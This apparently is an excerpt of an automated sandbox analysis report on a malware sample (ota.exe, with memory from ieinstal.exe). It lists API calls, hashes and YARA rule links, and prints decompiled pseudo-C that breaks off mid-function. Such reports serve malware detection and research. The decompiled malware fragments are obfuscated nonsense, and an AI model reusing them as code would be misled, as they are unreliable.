Function 0087424C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00874256

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c08c8964bafb898f26bf90e650c75ff572b6a631da7771250345db87f9de06ca
Instruction ID: 4f55b249290fbac47408715a653bd2ba04d2f455be66147f61275012abdebfed
Opcode Fuzzy Hash: c08c8964bafb898f26bf90e650c75ff572b6a631da7771250345db87f9de06ca
Instruction Fuzzy Hash: 65E0C27065830AEADA10E5808894BB771A8F759708FA2D106F99FC601BC310C890A526

Uniqueness

Uniqueness Score: -1.00%

Function 00874268, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00874256

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 29b67481e974c489a2c2d4f54d2f6e20f84d910236abc38a65a67740f3f011c1
Instruction ID: 20b95bac7ef0ca99b759a2326fd021feec0b48e0fc9496016b626a1ea33c79a5
Opcode Fuzzy Hash: 29b67481e974c489a2c2d4f54d2f6e20f84d910236abc38a65a67740f3f011c1
Instruction Fuzzy Hash: F8D0C234894309AAE960E98489A4BBB7658FBA2B48F90E106FACEC710B4720CC15D625

Uniqueness

Uniqueness Score: -1.00%

Function 00874234, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00874256

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 99f4ecee408b244d16df63e706476b02857ed158588e60921d38f7964eaf6e6b
Instruction ID: 0f29421c05ed3e2167711d4f9b4887508c02d6178517739d71e94c5b02498923
Opcode Fuzzy Hash: 99f4ecee408b244d16df63e706476b02857ed158588e60921d38f7964eaf6e6b
Instruction Fuzzy Hash: 68E08670118309AACA10D54044447767198FB51308FA1D003F99FCB01BC310C894A632

Uniqueness

Uniqueness Score: -1.00%

Function 008741CF, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00874256

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: de9b43b5acb872154a473641c2d16128bb5b75b7da481c662ebfc16fad407698
Instruction ID: a31013e4b03bb129ca2df2856b4d026337c2beba7777891b9a9579f7b6c4ad8e
Opcode Fuzzy Hash: de9b43b5acb872154a473641c2d16128bb5b75b7da481c662ebfc16fad407698
Instruction Fuzzy Hash: 43D0C27015830AAAEA20D5408894BB66198F795308FE1D107FD9FC650AC31088949923

Uniqueness

Uniqueness Score: -1.00%

Function 00873EF0, Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000000,00000000,00873DC5,00873F70), ref: 00873F18

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 85c1ec915dda8be7d4776f68ba356cecba4e4a1e799e024f0f8a5bdf960f6fae
Instruction ID: 3c9683dc51081230bd35980a43c08a3ea3d679c7d4b1f5844b90094c7a7f13ec
Opcode Fuzzy Hash: 85c1ec915dda8be7d4776f68ba356cecba4e4a1e799e024f0f8a5bdf960f6fae
Instruction Fuzzy Hash: 55D0A762C28208E4EE3059E44500BB51542F361BA4DC0C706974DC498F0200CA01B62B

Uniqueness

Uniqueness Score: -1.00%

Function 008741C0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00874256

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 792778b9dfe69e2484f916cf6a1d170841458a08dbd8bcff21526a06d34ef563
Instruction ID: 7590ad92167b0dad0038e341326379e06399ffd89c5b8d2128265aae4ca8232d
Opcode Fuzzy Hash: 792778b9dfe69e2484f916cf6a1d170841458a08dbd8bcff21526a06d34ef563
Instruction Fuzzy Hash: 2AD05B7015830EEADE10D5404894BB67194F755308FB1D107FC9FC601AC310D894A623

Uniqueness

Uniqueness Score: -1.00%

Function 00873EAF, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000000,00000000,00873DC5,00873F70), ref: 00873F18

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 86573e62f27d04cd7ac58be9e2c46503effaabe4ebf5e6b6d074524672ad48d7
Instruction ID: 2d29c168288abf7ba8424d859023f8459c0d29fdfccaf4944026c445357edb13
Opcode Fuzzy Hash: 86573e62f27d04cd7ac58be9e2c46503effaabe4ebf5e6b6d074524672ad48d7
Instruction Fuzzy Hash: 33D0A771768308B5FF3445404C81FB91121F740F04E30C01AF70EB80C886D15740B517

Uniqueness

Uniqueness Score: -1.00%

Function 00873EC3, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000000,00000000,00873DC5,00873F70), ref: 00873F18

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e2e815f9e5aca3c11bb1ceeafaf5b90145a1012baec91410c5fd1b5f358ebc3e
Instruction ID: 3c00cdcb956bc5a2d67685aa2b86d5bffcc0bfe0887ea9a8491aa5a1db29d4ff
Opcode Fuzzy Hash: e2e815f9e5aca3c11bb1ceeafaf5b90145a1012baec91410c5fd1b5f358ebc3e
Instruction Fuzzy Hash: BDD0A731768304B5FB3545404CC2FA55111AB40F04E70C019FB4E7D0C885D15640B917

Uniqueness

Uniqueness Score: -1.00%

Function 00874204, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00874256

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: a241cc40f16b7128ce2d699e786426ea711dd2fb31faaf33fcd30db32836ccad
Instruction ID: 9b86fa23fbcc5c3e845019bdb968dc28180da6819c26df7bd28a587f028357f1
Opcode Fuzzy Hash: a241cc40f16b7128ce2d699e786426ea711dd2fb31faaf33fcd30db32836ccad
Instruction Fuzzy Hash: C2D0C970158309AAD950D6408998BB6A2A8FB95304F61D106F9CE8A10A872099549626

Uniqueness

Uniqueness Score: -1.00%

Function 00873F14, Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000000,00000000,00873DC5,00873F70), ref: 00873F18

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f6ff77c8f89eb424b98dcf7c0fb5fcf69a7cb0b9ee5f2f6eb4aa6207df418bed
Instruction ID: 49e0b93d71f6dd374c7dbafcdf39042cfb317993c7edc34a991eb53d2904a875
Opcode Fuzzy Hash: f6ff77c8f89eb424b98dcf7c0fb5fcf69a7cb0b9ee5f2f6eb4aa6207df418bed
Instruction Fuzzy Hash: BCA002B182128986DE649E705508BD966115F60B55F4988259B995D90686300111F535

Uniqueness

Uniqueness Score: -1.00%

Function 00874B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00874B93

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d3809e1a5da203c9935fd37f9799a1cc1e99fcc02e11024985b70624935d4cbf
Instruction ID: 81887066f519c2d161fdc76cfd2b89621c7093acd9061cd34d746fd55adc963f
Opcode Fuzzy Hash: d3809e1a5da203c9935fd37f9799a1cc1e99fcc02e11024985b70624935d4cbf
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00872A99, Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00871E9B: TerminateThread.KERNEL32(000000FE,00000000), ref: 00871F1C

Sleep.KERNEL32(00000005), ref: 00872B4C

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: SleepTerminateThread
String ID:
API String ID: 480259992-0
Opcode ID: ad6580558c2bcb8093a716aaea90e907582700bc832793085365331e687c62fd
Instruction ID: 3e724e8768b7a36cf681c78a2d453bfbecf0e23e3ac4d22130f3ad3ccd79f260
Opcode Fuzzy Hash: ad6580558c2bcb8093a716aaea90e907582700bc832793085365331e687c62fd
Instruction Fuzzy Hash: F7F02760204318DFC6317F744188B647360FF15324F66C080E80ECB02F93A0C4849563

Uniqueness

Uniqueness Score: -1.00%

Function 00872AB3, Relevance: 1.3, APIs: 1, Instructions: 29sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5e791456f37fbafb3f1304f6fb27359ec1dd83ed3a6daa8c81bdaf17e11c25a7
Instruction ID: 9fef9b640b1c8220e76aee8888c71fefe29987936925d8f99510347cb1352820
Opcode Fuzzy Hash: 5e791456f37fbafb3f1304f6fb27359ec1dd83ed3a6daa8c81bdaf17e11c25a7
Instruction Fuzzy Hash: F2E0E560204355DFD222AF308589B617764FF16324F6AC095D54E8F07BE360C884D622

Uniqueness

Uniqueness Score: -1.00%

Function 00872ACB, Relevance: 1.3, APIs: 1, Instructions: 27sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5cb0ec4f2691f3e4ed44966fe6ac0214f36163e294c6896929dc29f4ff251109
Instruction ID: 05195ddc52c91b233efadb054d3e5d271a0c81a6ecc992eeec10cccbe31432c2
Opcode Fuzzy Hash: 5cb0ec4f2691f3e4ed44966fe6ac0214f36163e294c6896929dc29f4ff251109
Instruction Fuzzy Hash: B0E02B60200315DFC222AF204588F517760FF15320F65C094D50D8F07BE360C884C613

Uniqueness

Uniqueness Score: -1.00%

Function 00872AA8, Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b43ea5e530f271ab37f73c6723456cfdf1dfca983f67ce4b93de38747f8029b4
Instruction ID: 9c332c882b9d427444b4465b418740968ef097999d784fd4841f02efef4eb4c6
Opcode Fuzzy Hash: b43ea5e530f271ab37f73c6723456cfdf1dfca983f67ce4b93de38747f8029b4
Instruction Fuzzy Hash: 01E0C261600A19DFC2246F744948E68B764FF66335B79C0A1E22ECB07BE7A0C5419512

Uniqueness

Uniqueness Score: -1.00%

Function 00872B16, Relevance: 1.3, APIs: 1, Instructions: 20sleeplibrarynativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C
NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018), ref: 00872B8F
LoadLibraryA.KERNEL32(?,00000000), ref: 0087485F

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LibraryLoadMemoryProtectSleepVirtual
String ID:
API String ID: 3678984507-0
Opcode ID: ee3a7397b79bf702872c5d4475dc9dfdb5dcacd7ec580bfb838afc683868519d
Instruction ID: 3c0e66e1a2d4c650836cd55605cd8cb8b77cbdafaea76656be25a7e03926a693
Opcode Fuzzy Hash: ee3a7397b79bf702872c5d4475dc9dfdb5dcacd7ec580bfb838afc683868519d
Instruction Fuzzy Hash: 4FE086617045469FC211BE549589A44BB91FF22375B25C161D1198B16BF3A08944CA42

Uniqueness

Uniqueness Score: -1.00%

Function 00872AFC, Relevance: 1.3, APIs: 1, Instructions: 17sleeplibrarynativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00872B4C
NtProtectVirtualMemory.NTDLL(?,-0000001C,-00000018), ref: 00872B8F
LoadLibraryA.KERNEL32(?,00000000), ref: 0087485F

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID: LibraryLoadMemoryProtectSleepVirtual
String ID:
API String ID: 3678984507-0
Opcode ID: c3420f32b6fdb4963b75e68c3ce9b5d0bff86cbce9f3974dc88a0f394a88e740
Instruction ID: a9946e333003dc6253ec7841eaac345ff118b42dc39d41f4720804ed7bf0b513
Opcode Fuzzy Hash: c3420f32b6fdb4963b75e68c3ce9b5d0bff86cbce9f3974dc88a0f394a88e740
Instruction Fuzzy Hash: 57D0A762700605DF81106E604588B507794FFA6335B75C0A5E11D8B03BF3A0C5808553

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00874F70, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d5b952518179f2be296a82bb63fec3cb89956af9a222a3995ecdf9d3cb6753
Instruction ID: 2c25aa6075be2a0567bb874fab7dc45bd52d12f86db01e5c09d8bfbe25348c53
Opcode Fuzzy Hash: 70d5b952518179f2be296a82bb63fec3cb89956af9a222a3995ecdf9d3cb6753
Instruction Fuzzy Hash: F0F0DC3520CA4ECEC314DE0892D0AB633A6FB6134CF74E442D98FC751ECB20D844E652

Uniqueness

Uniqueness Score: -1.00%

Function 00874F79, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7320035af71884fede64f1c3d16db60faa36efd7127ed7afcdc5393c2925264
Instruction ID: 5d0d6e60721f69941bd10e4681885b85856616b3d1e1646e99d944f9a3105d71
Opcode Fuzzy Hash: f7320035af71884fede64f1c3d16db60faa36efd7127ed7afcdc5393c2925264
Instruction Fuzzy Hash: 8CF06739208E49DFD704CA1482C0FA63362FF66388F25D852DC4EC752DCB60DC48EA92

Uniqueness

Uniqueness Score: -1.00%

Function 00874668, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3a931b6bc25d1984367aab131fb92800338a0fff897a335416a37d86d1a554
Instruction ID: 76d44c57e27e712cce13511b2406b6b80c48dc27c95c7d6e06e5a8be4864f9ac
Opcode Fuzzy Hash: 4c3a931b6bc25d1984367aab131fb92800338a0fff897a335416a37d86d1a554
Instruction Fuzzy Hash: 9EC09230250644CFCE9ACE9EC1C0E50B3B8FB68700F9268A0E505CFB15D364E841DE00

Uniqueness

Uniqueness Score: -1.00%

Function 008729D9, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62fbd3a4a7bc95f187182dc1c67824e28790404fec00868c741930f4f572e6c
Instruction ID: 14fcca7a364df323c405dd7f17faba6d6f370de8a8d406bdc2ab04f3c9a87de1
Opcode Fuzzy Hash: b62fbd3a4a7bc95f187182dc1c67824e28790404fec00868c741930f4f572e6c
Instruction Fuzzy Hash: 9DC04C76641581CBFF45DA04C591B817371F759784F0844E4EC06CB715C328E9059500

Uniqueness

Uniqueness Score: -1.00%

Function 00874658, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1034924177.0000000000871000.00000040.00000001.sdmp, Offset: 00871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_871000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d8e2a1dbef69db3f78926163a746012dfefa50613031aee55c98a76a919178
Instruction ID: a4b0c54ec5b6e73a9468827c50838ffc2d7a6ae4b42346057d7368df0291cabc
Opcode Fuzzy Hash: 64d8e2a1dbef69db3f78926163a746012dfefa50613031aee55c98a76a919178
Instruction Fuzzy Hash: 7EC09B30250644CFDE55CE4DC1C0E5077B4FB66704B525491E416CB715D364D841DD01

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ota.exe PID: 4900 Parent PID: 4232 ota.exeCOMMON

Execution Graph

Execution Coverage:	17.4%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	0.4%
Total number of Nodes:	545
Total number of Limit Nodes:	82

Executed Functions

Function 00401594, Relevance: 6.4, APIs: 1, Strings: 1, Instructions: 2913
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			_entry_() {
				signed char _t648;
				signed int _t649;
				signed char _t650;
				void* _t788;
				signed char _t825;
				intOrPtr* _t863;
				signed int _t865;
				signed int _t1125;

				_push("VB5!6&*"); // executed
				L0040158C(); // executed
				 *_t648 =  *_t648 + _t648;
				 *_t648 =  *_t648 + _t648;
				 *_t648 =  *_t648 + _t648;
				 *_t648 =  *_t648 ^ _t648;
				 *_t648 =  *_t648 + _t648;
				_t649 = _t648 + 1;
				 *_t649 =  *_t649 + _t649;
				 *_t649 =  *_t649 + _t649;
				 *_t649 =  *_t649 + _t649;
				 *_t863 =  *_t863 + _t825;
				 *(_t649 - 0x4fb1148f) = _t649;
				_t650 = _t649 /  *(_t788 - 0x77);
				_t865 = _t649 %  *(_t788 - 0x77);
				_push(_t788);
				asm("sbb eax, 0x5c39");
				 *_t650 =  *_t650 + _t650;
				 *_t650 =  *_t650 + _t650;
				 *_t650 =  *_t650 + _t650;
				while(1) {
					 *_t650 =  *_t650 + _t650;
					 *_t825 =  *_t825 + _t825;
					 *(_t825 + 0x73) =  *(_t825 + 0x73) & _t650;
					_t10 = _t825 + 0x62;
					 *_t10 =  *(_t825 + 0x62) & _t825;
					_t1125 =  *_t10;
					_t825 = _t825 - 1;
					asm("bound edi, [ecx+0x67]");
				}
				L8:
				_t650 = _t650 + 1;
				asm("lds eax, [ebp-0x144dbea7]");
				 *(_t650 + 0x40900216) =  *(_t650 + 0x40900216) >> 1;
				goto L8;
			}

0x00401594
0x00401599
0x0040159e
0x004015a0
0x004015a2
0x004015a4
0x004015a6
0x004015a8
0x004015a9
0x004015ab
0x004015ad
0x004015af
0x004015b3
0x004015b9
0x004015b9
0x004015bc
0x004015bd
0x004015c2
0x004015c4
0x004015c6
0x004015c7
0x004015c7
0x004015c9
0x004015cb
0x004015ce
0x004015ce
0x004015ce
0x004015cf
0x004015d0
0x004015d0
0x004015f0
0x004015f0
0x004015f7
0x004015eb
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401599

Strings

VB5!6&*, xrefs: 00402D4C, 00401594

Memory Dump Source

Source File: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: b5155c13590b09281003f23988a17cc44e39d94247ce34523ca645a76bbb2565
Instruction ID: 00f7761a049f187c489a4db43d4ffc091c327e6076605b89529a955ac99c2927
Opcode Fuzzy Hash: b5155c13590b09281003f23988a17cc44e39d94247ce34523ca645a76bbb2565
Instruction Fuzzy Hash: 9E23DF7244E3C09FC7079B708E691653FB5EE2332471906EBC8819E1E3D26D9D0AD76A

Uniqueness

Uniqueness Score: -1.00%

Function 00411CEF, Relevance: 580.5, APIs: 294, Strings: 36, Instructions: 3005
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00411CEF(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				short _v52;
				void* _v56;
				long long* _v68;
				char _v80;
				long long _v92;
				short _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v128;
				long long* _v140;
				char _v152;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				long long _v180;
				signed int _v184;
				long long _v188;
				intOrPtr _v192;
				short _v196;
				signed int _v200;
				char _v204;
				signed int _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char* _v232;
				char _v240;
				char* _v248;
				char _v256;
				char* _v264;
				char _v272;
				char* _v280;
				char _v288;
				intOrPtr _v296;
				char _v304;
				intOrPtr _v312;
				intOrPtr _v320;
				intOrPtr _v328;
				intOrPtr _v336;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				void* _v372;
				signed int _v376;
				signed int _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				intOrPtr _v404;
				char _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				intOrPtr* _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				char* _v496;
				signed int _v500;
				signed int _v504;
				char _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				intOrPtr* _v536;
				signed int _v540;
				intOrPtr* _v544;
				signed int _v548;
				char _v552;
				signed int _v556;
				char _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				signed int _v576;
				intOrPtr* _v580;
				signed int _v584;
				intOrPtr* _v588;
				signed int _v592;
				intOrPtr* _v596;
				signed int _v600;
				intOrPtr* _v604;
				signed int _v608;
				intOrPtr* _v612;
				signed int _v616;
				signed int _v620;
				char _v624;
				signed int _v628;
				char _v632;
				signed int _v636;
				intOrPtr* _v640;
				signed int _v644;
				intOrPtr* _v648;
				signed int _v652;
				char _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				intOrPtr* _v672;
				signed int _v676;
				intOrPtr* _v680;
				signed int _v684;
				intOrPtr _v688;
				char _v692;
				char _v696;
				signed int _v700;
				intOrPtr* _v704;
				signed int _v708;
				char _v712;
				signed int _v716;
				signed int _v720;
				intOrPtr* _v724;
				signed int _v728;
				intOrPtr* _v732;
				signed int _v736;
				intOrPtr* _v740;
				signed int _v744;
				intOrPtr* _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				signed int _v764;
				intOrPtr* _v768;
				signed int _v772;
				signed int _v776;
				intOrPtr* _v780;
				signed int _v784;
				char _v788;
				signed int _v792;
				signed int _v796;
				signed int _v800;
				intOrPtr* _v804;
				signed int _v808;
				intOrPtr* _v812;
				signed int _v816;
				intOrPtr* _v820;
				signed int _v824;
				char _v828;
				signed int _v832;
				intOrPtr* _v836;
				signed int _v840;
				signed int _v844;
				char _v848;
				signed int _v852;
				intOrPtr* _v856;
				signed int _v860;
				intOrPtr* _v864;
				signed int _v868;
				intOrPtr _v872;
				signed long long _v880;
				signed long long _v884;
				signed int _v888;
				intOrPtr* _v892;
				signed int _v896;
				intOrPtr* _v900;
				signed int _v904;
				intOrPtr* _v908;
				signed int _v912;
				char _v916;
				signed int _v920;
				intOrPtr* _v924;
				signed int _v928;
				signed int _v932;
				char _v936;
				signed int _v940;
				signed int _v944;
				signed int _v948;
				char* _t1424;
				signed int _t1429;
				signed int _t1433;
				signed int _t1437;
				signed int _t1441;
				signed int _t1445;
				signed int _t1449;
				signed int _t1453;
				signed int _t1457;
				char* _t1461;
				signed int _t1465;
				char* _t1469;
				signed int _t1473;
				signed int _t1482;
				signed int _t1491;
				signed int _t1499;
				signed int _t1502;
				signed int _t1506;
				signed int _t1510;
				signed int _t1516;
				signed int _t1521;
				signed int _t1532;
				signed int _t1539;
				signed int _t1543;
				signed int _t1547;
				signed int _t1551;
				char* _t1560;
				signed int _t1562;
				signed int _t1577;
				signed int _t1581;
				signed int _t1593;
				signed int _t1598;
				signed short _t1606;
				signed int _t1610;
				signed int _t1614;
				signed int _t1618;
				signed int _t1622;
				signed int _t1626;
				signed int _t1630;
				signed int _t1634;
				char* _t1638;
				signed int _t1642;
				signed int* _t1657;
				signed int _t1660;
				signed int _t1664;
				char _t1665;
				signed int _t1669;
				signed int _t1672;
				signed int _t1675;
				signed int _t1682;
				signed int _t1687;
				signed int _t1691;
				signed int _t1695;
				signed int* _t1699;
				char* _t1709;
				signed int _t1713;
				signed int _t1717;
				signed int _t1719;
				signed int _t1731;
				signed int _t1734;
				signed int _t1742;
				signed int _t1746;
				signed int _t1750;
				signed int _t1754;
				signed int _t1758;
				signed int _t1762;
				char* _t1766;
				signed int _t1770;
				signed int _t1788;
				intOrPtr _t1795;
				signed int _t1799;
				signed int _t1802;
				signed int _t1810;
				signed int _t1814;
				signed int _t1819;
				signed int _t1823;
				signed int _t1840;
				signed int _t1851;
				signed int _t1855;
				signed int _t1859;
				char* _t1860;
				signed int _t1864;
				signed int* _t1865;
				signed int _t1868;
				signed int _t1872;
				signed int _t1876;
				signed int _t1883;
				signed int _t1887;
				char* _t1888;
				signed int _t1891;
				signed int _t1897;
				char* _t1901;
				signed int _t1904;
				signed int _t1909;
				signed int _t1913;
				signed int _t1926;
				signed int _t1931;
				signed int _t1934;
				signed int _t1939;
